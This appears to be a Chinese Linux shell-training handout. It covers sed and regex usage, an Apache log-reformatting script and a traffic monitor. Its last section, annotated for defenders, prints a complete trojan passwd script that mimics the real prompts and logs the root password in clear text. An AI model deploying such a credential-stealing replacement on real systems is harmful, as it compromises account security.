sed -options 'command' /etc/passwd
cat /etc/passwd | sed -options 'command'
-i <------------------------这个参数会直接修改原文件(建议写成 -i.bak,修改前先保留一份备份)
删除行
# sed -e 'd' /etc/passwd <-- d 删除行的命令,每处理一行,就执行一次删除行的操作。
# head -5 /etc/passwd | sed -e '1,3d' 删除1到3行
# head -5 /etc/passwd | sed -e '1d;3d'删除第一行和第三行
# head -5 /tmp/test/passwd | sed -e '/root/d' 删除包含root关键字的行
# head -5 /tmp/test/passwd | sed -e '/^root/d' 删除以root开头的行
# head -5 /tmp/test/passwd | sed -e '/nologin$/d'
[root@dns shell_05]# cat /etc/rc.local | sed -e '/^#/d;/^$/d' 删除以#开头或者是空行的行
打印行
# head -5 /tmp/test/passwd |sed -e '1p'
# head -5 /tmp/test/passwd |sed -n -e '1p' 注意对比两个命令的区别
[root@dns shell_05]# head -5 /etc/passwd |sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[root@dns shell_05]# cat /tmp/test/passwd | sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemonroot:x:2:2:daemon:/sbin:/sbin/nologin
rootlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sdfsdgdfgdfgfeg
line2
line3
line4
daemon
替换
# cat /tmp/test/passwd | sed -e '1,5s/daemon/@@@@@/g'
# cat /tmp/test/passwd | sed -e 's/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '1,$s/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '/^root/,/^bin/s/x/@/'
替换并且修改源文件:
# sed -i 's/line/@@@@@/g' /tmp/test/passwd <---使用-i时必须直接指定文件名,不能从管道读入
# cat /tmp/test/passwd | sed -e 's/\/sbin\/nologin/\/bin\/false/'
正则表达式
.匹配任意一个字符
*匹配前一个字符0次或者多次
^# 匹配以#开头的
#$ 匹配以#结尾的
[abcd] 匹配a或者b或者c或者d
[^abc] 匹配除a、b、c以外的任意一个字符
h{2} 与hh匹配 2代表前面的字符重复2次(不带-r时要写成h\{2\})
h{2,3} 与hh或者hhh匹配
h+ 匹配一个或者多个h
h* 匹配0或者多个h
h? 匹配0个或者1个h
[a-z] 匹配小写字符
[A-Z] 匹配大写字母
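[a-Z] 匹配所有的字母(这个范围依赖locale,在C/POSIX locale下是无效范围,sed会直接报错;用来校验输入时更稳妥的写法是[a-zA-Z]或[[:alpha:]])
[:alnum:] 匹配字母和数字(字符类必须写在方括号里使用,例如[[:alnum:]],下同)
[:blank:] 匹配空格或者制表符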
[:digit:] 匹配纯数字
[:lower:] 匹配小写字母
[:upper:] 匹配大写字母
[:punct:] 标点符号
===========================================================================================================================================
域:
例子:
[root@qianxin df]# date +%m-%d-%y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
将04-13-10变化为10-04-13
[root@qianxin df]# date +%m-%d-%y | sed -r 's/(.*)-(.*)-(.*)/\3-\1-\2/'
将04-13-10变化为10-04-13
# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!
使用“域”来定位
# date +%m-%d-%Y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
2010-04-13
# date +%m-%d-%Y | sed -r 's/(.*)-(.*)-(.*)/\3-\1-\2/'
2010-04-13
# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!
域的匹配是“贪婪”模式
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*)!/\1/'
come on,baby
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*),(.*)!/\1/'
come on
删除每行的第一个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.*\)/\2/'
删除每行的第二个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.\)\(.*\)/\1\3/'
删除每行的最后一个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)/\1/'
删除每行的倒数第二个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)\(.\)/\1\3/'
删除第二个单词
# cat /etc/fstab | sed -r 's/([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]+)(.*)/\1\2\4\5/'
删除倒数第二个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4\5\6/'
删除最后一个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4/'
=============================================================================================================================================================
例子1:处理apache的日志文件
处理前:
19070 id.zdanswer.cn 220.166.58.80 - - [10/Sep/2009:12:47:56 +0800] "GET /afsunion/xdpsrp.js HTTP/1.1" 200 1674 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sicent)"
处理中:
[10/Sep/2009:12:47:56 220.166.58.80 id.zdanswer.cn /afsunion/xdpsrp.js 200 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg"
处理后:
2009-09-10 12:47:56 220.166.58.80 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg
执行脚本如下:
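#!/bin/bash
# Rewrite selected fields of httpd.log as
#   YYYY-MM-DD HH:MM:SS client-ip vhost request-path status referer
# and print the result on stdout.

# mktemp has to be *run* through command substitution. A bare `a=mktemp` only
# stores the word "mktemp", so the script would write to, and then delete, a
# file of that fixed name in the current directory instead of a private,
# unpredictably named scratch file.
a=$(mktemp) || exit 1
# Remove the scratch file on every exit path, not only after a clean run.
trap 'rm -f -- "$a"' EXIT

# Fields of the sample log line: $6 "[DD/Mon/YYYY:HH:MM:SS", $3 client IP,
# $2 virtual host, $9 request path, $11 status, $13 quoted referer.
awk '{print ($6,$3,$2,$9,$11,$13)}' httpd.log > "$a" || exit 1

# Every date edit is anchored to the start of the line. The request path and
# the referer are supplied by the client, so an unanchored "/Jan/" or digit
# pattern could match inside them and silently alter the logged value.
# '#' is used as the s-command delimiter so the slashes need no escaping.
sed -r '
  s#^\[##
  s#^([0-9]+)/Jan/#\1-01-#
  s#^([0-9]+)/Feb/#\1-02-#
  s#^([0-9]+)/Mar/#\1-03-#
  s#^([0-9]+)/Apr/#\1-04-#
  s#^([0-9]+)/May/#\1-05-#
  s#^([0-9]+)/Jun/#\1-06-#
  s#^([0-9]+)/Jul/#\1-07-#
  s#^([0-9]+)/Aug/#\1-08-#
  s#^([0-9]+)/Sep/#\1-09-#
  s#^([0-9]+)/Oct/#\1-10-#
  s#^([0-9]+)/Nov/#\1-11-#
  s#^([0-9]+)/Dec/#\1-12-#
  s#^([0-9]+-[0-9]+-[0-9]+):#\1 #
  s#^([0-9]+)(-[0-9]+-)([0-9]+)#\3\2\1#
  s#"##
  s#"##
' "$a"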
------------------------------------------------------------------------------------------------------------------------------------------
其他方法:
#!/bin/bash
# Pull date, time, client IP, virtual host, request path, status and the
# referer (surrounding quotes stripped) out of every line of log.txt and
# write them, space separated, to log1.txt.
cat log.txt \
  | awk '{
      day     = substr($6, 2, 11)                # DD/Mon/YYYY without the leading "["
      clock   = substr($6, 14)                   # HH:MM:SS
      referer = substr($13, 2, length($13) - 2)  # drop the first and last character
      print day, clock, $3, $2, $9, $11, referer
    }' > log1.txt
10/Oct/2009 12:47:10 222.209.211.147 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg
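# Turn the leading "DD/Mon/YYYY HH:MM:SS" of each line of log1.txt into
# "YYYY-MM-DD HH:MM:SS" and write the result to log2.txt.
#
# Two fixes over the one-line form:
#  - the January rule was spelled "Jau", so January dates kept the month name;
#  - every rule is anchored to the date at the start of the line. The request
#    path and referer are supplied by the client, and an unanchored month name
#    (e.g. "Mar" inside a URL) would otherwise be rewritten in the log.
# '#' is used as the s-command delimiter so the slashes need no escaping.
sed -r '
  s#^([0-9]+)/([A-Za-z]+)/([0-9]+) (..):(..):(..) (.*)#\3-\2-\1 \4:\5:\6 \7#
  s#^([0-9]+)-Jan-#\1-01-#
  s#^([0-9]+)-Feb-#\1-02-#
  s#^([0-9]+)-Mar-#\1-03-#
  s#^([0-9]+)-Apr-#\1-04-#
  s#^([0-9]+)-May-#\1-05-#
  s#^([0-9]+)-Jun-#\1-06-#
  s#^([0-9]+)-Jul-#\1-07-#
  s#^([0-9]+)-Aug-#\1-08-#
  s#^([0-9]+)-Sep-#\1-09-#
  s#^([0-9]+)-Oct-#\1-10-#
  s#^([0-9]+)-Nov-#\1-11-#
  s#^([0-9]+)-Dec-#\1-12-#
' log1.txt > log2.txt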
10/Sep/2009:12:47:10 222.209.211.147 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg
================================================================================================================================================================
例子2:本机流量监控
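#!/bin/bash
# Example 2: average receive/transmit rate of one local network interface.
#
# Usage: <script> IFACE SECONDS
#   IFACE   - interface name exactly as listed in /proc/net/dev (e.g. eth0)
#   SECONDS - sampling interval, a positive integer
# Output: average bytes per second received and sent during the interval.

iface=$1
interval=$2

# Succeed only if every argument is a plain non-negative integer.
is_uint() {
  local v
  for v in "$@"; do
    [[ "$v" =~ ^[0-9]+$ ]] || return 1
  done
}

# Print "rx_bytes tx_bytes" for exactly the named interface.
# The colon after the name is turned into a space first, so the
# "eth0:123" and "eth0: 123" layouts of /proc/net/dev parse the same way,
# and the name is compared for equality so "eth0" does not also match "eth0.1".
read_counters() {
  awk -v ifc="$1" '{ sub(/:/, " ") } $1 == ifc { print $2, $10 }' /proc/net/dev
}

# Validate before use: the interval is a divisor (zero would abort the
# arithmetic) and bash arithmetic evaluates its operands as expressions, so
# only plain digits may reach $(( )).
if [[ -z "$iface" || ! "$interval" =~ ^[1-9][0-9]*$ ]]; then
  printf 'Usage: %s IFACE SECONDS\n' "${0##*/}" >&2
  exit 2
fi

read -r rx_start tx_start < <(read_counters "$iface")
if ! is_uint "$rx_start" "$tx_start"; then
  printf 'interface not found in /proc/net/dev: %s\n' "$iface" >&2
  exit 1
fi

# The wait has to sit between the two samples; sampling twice and sleeping
# afterwards measures an interval of almost zero.
sleep "$interval"

read -r rx_end tx_end < <(read_counters "$iface")
if ! is_uint "$rx_end" "$tx_end"; then
  printf 'interface disappeared from /proc/net/dev: %s\n' "$iface" >&2
  exit 1
fi

jin=$(( (rx_end - rx_start) / interval ))
chu=$(( (tx_end - tx_start) / interval ))

echo "平均接收的流量:'$jin'byte"
echo "平均发送的流量:'$chu'byte"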
~
=================================================================================================================================================================
例子3:shell病毒--劫持passwd,盗取密码修改信息 (时间允许的话才讲)<--------------------------201004101---passwd.sh---passwd
# NOTE(review): this listing imitates the interactive prompts of passwd and
# records what the user types. The code is left exactly as published; it is a
# sample to recognise, and the comments describe what a defender can look for.
#
# Indicators visible in the listing:
#  - it is a shell script, while the section heading indicates it is installed
#    under the name passwd. /usr/bin/passwd is normally a packaged binary, so a
#    script at that path, or a package verification mismatch (on RPM-based
#    systems, `rpm -V` for the owning package), points to tampering;
#  - it refers to /usr/bin/passwd1, presumably the genuine binary under a new
#    name (TODO confirm); an unexpected passwd1 beside passwd is an indicator;
#  - it sends the typed password to syslog with the tag "passwd for root:".
# File-integrity monitoring on the directories in root's PATH and a log search
# for that tag cover all three.
count=1
# No argument: take the interactive path that shows passwd-style messages.
if [ -z $1 ];then
echo "Changing password for user root."
while true
# Both prompts read silently (-s), like the genuine tool.
read -s -p "New UNIX password:" passwd1
echo
read -s -p "Retype new UNIX password:" passwd2
echo
do
if [ $passwd1 = $passwd2 ] ;then
echo "passwd: all authentication tokens updated successfully."
# c holds the typed password in clear text from here on.
c=$passwd1
break
elif [ $passwd1 -eq $passwd2 ];then
echo "passwd: all authentication tokens updated successfully."
c=$passwd1
break
else
echo "Sorry, passwords do not match."
if [ $count -eq 3 ];then
sleep 2
echo "passwd: Authentication information cannot be recovered"
break
else
let count++
continue
fi
fi
done
# The typed value is passed on to /usr/bin/passwd with all output discarded,
# presumably so that the password change still takes effect.
/bin/echo "$c" | /usr/bin/passwd --stdin root &> /dev/null
# The clear-text password is written to syslog. Any account whose password
# shows up in a log this way must be treated as compromised and rotated, and
# the log (plus any remote copy of it) handled as sensitive.
logger -t "passwd for root:" "$c"
else
# With an argument the call is handed to /usr/bin/passwd1 and nothing is
# captured by this script.
/usr/bin/passwd1 $1
fi